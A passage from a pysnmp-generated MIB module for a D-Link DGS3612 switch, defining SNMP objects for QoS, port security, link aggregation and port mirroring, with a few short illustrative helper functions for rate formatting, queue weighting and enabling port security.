swL2QOSBandwidthTxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(64, 10000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSBandwidthTxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthTxRate.setDescription('Indicates the TX rate (in units of 1 Kbit/sec) of the specified port. The value 10000000 means no limit.')
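# Illustrative sketch: interpreting the Rx/Tx rate objects above, whose value
# is expressed in units of 1 Kbit/sec and where 10000000 means no limit, per
# the descriptions.
def exampleFormatBandwidthRate(rate):
    rate = int(rate)
    if rate == 10000000:
        return 'no limit'
    if not 64 <= rate <= 10000000:
        raise ValueError('rate must be within 64..10000000 Kbit/sec')
    return '%d Kbit/sec' % rate

# e.g. exampleFormatBandwidthRate(10000000) -> 'no limit'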
swL2QOSBandwidthRadiusRxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusRxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusRxRate.setDescription('The Rx Rate value comes from the RADIUS server. If an 802.1X port is authenticated, this value will overwrite the locally configured Rx Rate.')
swL2QOSBandwidthRadiusTxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusTxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusTxRate.setDescription('The Tx Rate value comes from the RADIUS server. If an 802.1X port is authenticated, this value will overwrite the locally configured Tx Rate.')
swL2QOSSchedulingTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2), )
if mibBuilder.loadTexts: swL2QOSSchedulingTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingTable.setDescription('A table that contains QoS scheduling information for each port and hardware queue.')
swL2QOSSchedulingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOSSchedulingPort"), (0, "DGS3612-L2MGMT-MIB", "swL2QOSSchedulingClassID"))
if mibBuilder.loadTexts: swL2QOSSchedulingEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingEntry.setDescription('A list of information contained in swL2QOSSchedulingTable.')
swL2QOSSchedulingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingPort.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingPort.setDescription('Indicates the port number.')
swL2QOSSchedulingClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingClassID.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingClassID.setDescription('Indicates the hardware queue number.')
swL2QOSSchedulingMaxPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMaxPkts.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMaxPkts.setDescription('Indicates the maximum number of packets the hardware priority queue will be allowed to transmit before allowing the next lowest priority queue to transmit its packets. A value between 0 and 15 can be specified.')
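# Illustrative sketch: estimating each queue's share of the link under the
# round-robin behaviour described above, where swL2QOSSchedulingMaxPkts is
# the number of packets a queue may transmit before yielding. This assumes
# equal packet sizes and permanently backlogged queues, which is a
# simplification, not a statement of the device's exact behaviour.
def exampleWrrShares(maxPktsPerQueue):
    total = sum(maxPktsPerQueue)
    if total == 0:
        raise ValueError('at least one queue must have a non-zero weight')
    return [pkts / total for pkts in maxPktsPerQueue]

# e.g. exampleWrrShares([1, 2, 5]) -> [0.125, 0.25, 0.625]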
swL2QOSSchedulingMechanism = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanism.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanism.setDescription('Indicates the mechanism of QOS scheduling.')
swL2QOSSchedulingMechanismEffec = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismEffec.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismEffec.setDescription('Indicates the effective mechanism of QoS scheduling. If the swQoSSchedulingWeight is configured to be 0, then this object will always display strict (1).')
swL2QOS8021pUserPriorityTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3), )
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityTable.setDescription('A table that maps each 802.1p user priority to a hardware priority queue.')
swL2QOS8021pUserPriorityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOS8021pUserPriorityIndex"))
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityEntry.setDescription('A list of information contained in swL2QOS8021pUserPriorityTable.')
swL2QOS8021pUserPriorityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityIndex.setDescription('The 802.1p user priority.')
swL2QOS8021pUserPriorityClass = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 6))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityClass.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityClass.setDescription("The number of the switch's hardware priority queue. The hardware priority queues are numbered between 0 (the lowest priority) and 6 (the highest priority).")
swL2QOS8021pDefaultPriorityTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4), )
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityTable.setDescription('A table that contains the default 802.1p priority for each port.')
swL2QOS8021pDefaultPriorityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOS8021pDefaultPriorityIndex"))
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityEntry.setDescription('A list of information contained in swL2QOS8021pDefaultPriorityTable.')
swL2QOS8021pDefaultPriorityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityIndex.setDescription('Indicates the port number.')
swL2QOS8021pDefaultPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriority.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriority.setDescription('The priority value to assign to untagged packets received on the ports of the switch.')
swL2QOS8021pRadiusPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pRadiusPriority.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pRadiusPriority.setDescription('Indicates the 802.1p value that comes from the RADIUS server. If an 802.1X port is authenticated, this value will overwrite the locally configured value.')
swL2QOSSchedulingMechanismCtrl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismCtrl.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismCtrl.setDescription('This object controls the QoS scheduling mechanism.')
swL2QOSHolPreventionCtrl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSHolPreventionCtrl.setStatus('current')
if mibBuilder.loadTexts: swL2QOSHolPreventionCtrl.setDescription('Controls QoS Head-of-Line (HOL) prevention.')
swCosBandwidthControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7), )
if mibBuilder.loadTexts: swCosBandwidthControlTable.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthControlTable.setDescription('A table that contains information about CoS Bandwidth Control on each port.')
swCosBandwidthControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swCosBandwidthPort"), (0, "DGS3612-L2MGMT-MIB", "swCosBandwidthClassID"))
if mibBuilder.loadTexts: swCosBandwidthControlEntry.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthControlEntry.setDescription('A list that contains CoS Bandwidth Control information for each port.')
swCosBandwidthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swCosBandwidthPort.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthPort.setDescription('This object indicates the port number.')
swCosBandwidthClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swCosBandwidthClassID.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthClassID.setDescription('Indicates the hardware queue number.')
swCosBandwidthMinRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(64, 10000000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCosBandwidthMinRate.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthMinRate.setDescription('Indicates the Minimum Rate of the specified port. A value of 0 means no limit.')
swCosBandwidthMaxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(64, 10000000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCosBandwidthMaxRate.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthMaxRate.setDescription('Indicates the Maximum Rate of the specified port. A value of 0 means no limit.')
swCpuRxRateControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8), )
if mibBuilder.loadTexts: swCpuRxRateControlTable.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlTable.setDescription('A table that contains information about CPU receiving rate control.')
swCpuRxRateControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swCpuRxClassID"))
if mibBuilder.loadTexts: swCpuRxRateControlEntry.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlEntry.setDescription('A list that contains CPU CoS receiving rate control information.')
swCpuRxClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2)))
if mibBuilder.loadTexts: swCpuRxClassID.setStatus('current')
if mibBuilder.loadTexts: swCpuRxClassID.setDescription('Indicates the Class of Service ID.')
swCpuRxRateControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCpuRxRateControlStatus.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlStatus.setDescription('Indicates the status of receiving rate control.')
swL2PortSecurityControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1), )
if mibBuilder.loadTexts: swL2PortSecurityControlTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityControlTable.setDescription('The port security feature controls the address learning capability and the traffic forwarding decision. Each port can have this function enabled or disabled. When it is enabled with a given number N, which allows N addresses to be learned on this port, the first N learned addresses are locked on this port as static entries. Once the number of learned addresses reaches N, any incoming packet with an unlearned source address is discarded (e.g. dropped) and no more new addresses can be learned on this port.')
swL2PortSecurityControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortSecurityPortIndex"))
if mibBuilder.loadTexts: swL2PortSecurityControlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityControlEntry.setDescription('A list of information contained in swL2PortSecurityControlTable.')
swL2PortSecurityPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortSecurityPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityPortIndex.setDescription('Indicates the secured port on which address learning is locked.')
swL2PortSecurityMaxLernAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityMaxLernAddr.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityMaxLernAddr.setDescription('Indicates the number of addresses allowed to be learned on this port.')
swL2PortSecurityMode = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("permanent", 2), ("deleteOnTimeout", 3), ("deleteOnReset", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityMode.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityMode.setDescription('Indicates the mode of locking addresses. In deleteOnTimeout(3) mode, the locked addresses can be aged out after the aging timer expires; when a locked address is aged out, the number of addresses that can be learned is increased by one. In deleteOnReset(4) mode, the locked addresses are never aged out unless the system is restarted, which protects against port movement or intrusion.')
swL2PortSecurityAdmState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("enable", 2), ("disable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityAdmState.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityAdmState.setDescription('Indicates the administrative state of address locking.')
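# Illustrative sketch: enabling port security on one port by writing the three
# writable columns above (maximum learned addresses, lock mode, admin state).
# Table instances are addressed by appending the port index to the column OID.
# Host and community are hypothetical placeholders; requires pysnmp.
def exampleEnablePortSecurity(host, community, port, maxAddrs=1):
    from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                              ContextData, ObjectType, ObjectIdentity,
                              Integer32, setCmd)
    base = (1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1, 1)
    varBinds = [
        ObjectType(ObjectIdentity(base + (2, port)), Integer32(maxAddrs)),
        ObjectType(ObjectIdentity(base + (3, port)), Integer32(3)),   # deleteOnTimeout(3)
        ObjectType(ObjectIdentity(base + (4, port)), Integer32(2)),   # enable(2)
    ]
    errorIndication, errorStatus, _, _ = next(setCmd(
        SnmpEngine(), CommunityData(community),
        UdpTransportTarget((host, 161)), ContextData(), *varBinds))
    if errorIndication or errorStatus:
        raise RuntimeError(str(errorIndication or errorStatus.prettyPrint()))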
swL2PortSecurityDelCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2))
swL2PortSecurityDelVlanName = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelVlanName.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelVlanName.setDescription('Indicates the VLAN name.')
swL2PortSecurityDelPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 768))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelPort.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelPort.setDescription('Indicates the port. A value of 0 indicates that the function is not currently in operation.')
swL2PortSecurityDelMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 3), MacAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelMacAddress.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelMacAddress.setDescription('Specifies the MAC address.')
swL2PortSecurityDelActivity = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("none", 1), ("start", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortSecurityDelActivity.setStatus('current')
if mibBuilder.loadTexts: swL2PortSecurityDelActivity.setDescription('When set to start(2), the switch deletes the port security entry identified by the VLAN name, port, and MAC address objects above.')
swL2TrunkMaxSupportedEntries = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkMaxSupportedEntries.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMaxSupportedEntries.setDescription('Maximum number of entries in the trunk configuration table (swL2TrunkCtrlTable).')
swL2TrunkCurrentNumEntries = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkCurrentNumEntries.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCurrentNumEntries.setDescription('The number of currently active entries in the trunk configuration table.')
swL2TrunkCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3), )
if mibBuilder.loadTexts: swL2TrunkCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCtrlTable.setDescription('This table specifies how a set of ports (up to 8) is grouped into a single logical link.')
swL2TrunkCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkIndex"))
if mibBuilder.loadTexts: swL2TrunkCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkCtrlEntry.setDescription('A list of information specifying how a set of ports (up to 8) is grouped into a single logical link.')
swL2TrunkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkIndex.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkIndex.setDescription('The index of the logical port trunk. The available trunk group numbers depend on the existence of units and modules.')
swL2TrunkMasterPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkMasterPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMasterPort.setDescription('The object indicates the master port number of the port trunk entry. When using port trunking, the other ports of the group cannot be configured individually; their configuration must be the same as that of the master port (e.g. speed, duplex, enabled/disabled, flow control, and so on).')
swL2TrunkMember = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 4), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkMember.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkMember.setDescription('Indicates which ports are included in this trunk. The available trunk ports depend on the existence of modules. The maximum number of ports in one trunk is 8.')
swL2TrunkFloodingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkFloodingPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkFloodingPort.setDescription('The object indicates the flooding port number of the port trunk entry. The first port of the trunk is implicitly configured to be the flooding port.')
swL2TrunkType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("static", 2), ("lacp", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkType.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkType.setDescription('This object indicates the type of the trunk group: static(2) is a static trunk group, and lacp(3) is an LACP trunk group.')
swL2TrunkState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2TrunkState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkState.setDescription('This object indicates the status of this entry.')
swL2TrunkActivePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 3, 1, 8), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkActivePorts.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkActivePorts.setDescription('The object indicates the active ports of the port trunk entry.')
swL2TrunkAlgorithm = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("other", 1), ("mac-source", 2), ("mac-destination", 3), ("mac-source-dest", 4), ("ip-source", 5), ("ip-destination", 6), ("ip-source-dest", 7)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkAlgorithm.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkAlgorithm.setDescription('This object configures the part of the packet examined by the switch when selecting the egress port for transmitting load-sharing data.')
swL2TrunkLACPPortTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5), )
if mibBuilder.loadTexts: swL2TrunkLACPPortTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortTable.setDescription('This table specifies how a set of ports (up to 8) is grouped into a single logical link.')
swL2TrunkLACPPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkLACPPortIndex"))
if mibBuilder.loadTexts: swL2TrunkLACPPortEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortEntry.setDescription('A list of information specifying how a set of ports (up to 8) is grouped into a single logical link.')
swL2TrunkLACPPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkLACPPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortIndex.setDescription('The index of the logical LACP port.')
swL2TrunkLACPPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 5, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("active", 1), ("passive", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkLACPPortState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkLACPPortState.setDescription('The LACP state of the logical port.')
swL2TrunkVLANTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6), )
if mibBuilder.loadTexts: swL2TrunkVLANTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANTable.setDescription('This table is used to manage the VLAN trunking feature of the device.')
swL2TrunkVLANEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrunkVLANPort"))
if mibBuilder.loadTexts: swL2TrunkVLANEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANEntry.setDescription('This object is used to configure the VLAN trunking settings for each port.')
swL2TrunkVLANPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrunkVLANPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANPort.setDescription('This object indicates the port being configured.')
swL2TrunkVLANState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrunkVLANState.setStatus('current')
if mibBuilder.loadTexts: swL2TrunkVLANState.setDescription('The VLAN trunking state of the port.')
swL2MirrorLogicTargetPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorLogicTargetPort.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorLogicTargetPort.setDescription('This object indicates which port of the switch will sniff another port. A trunk port member cannot be configured as a target sniffing port. The port number is the sequential (logical) number which is also applied to the bridge MIB, etc.')
swL2MirrorPortSourceIngress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorPortSourceIngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortSourceIngress.setDescription('This object represents the source ports whose ingress packets will be sniffed.')
swL2MirrorPortSourceEgress = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MirrorPortSourceEgress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortSourceEgress.setDescription('This object represents the source ports whose egress packets will be sniffed.')
swL2MirrorPortState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
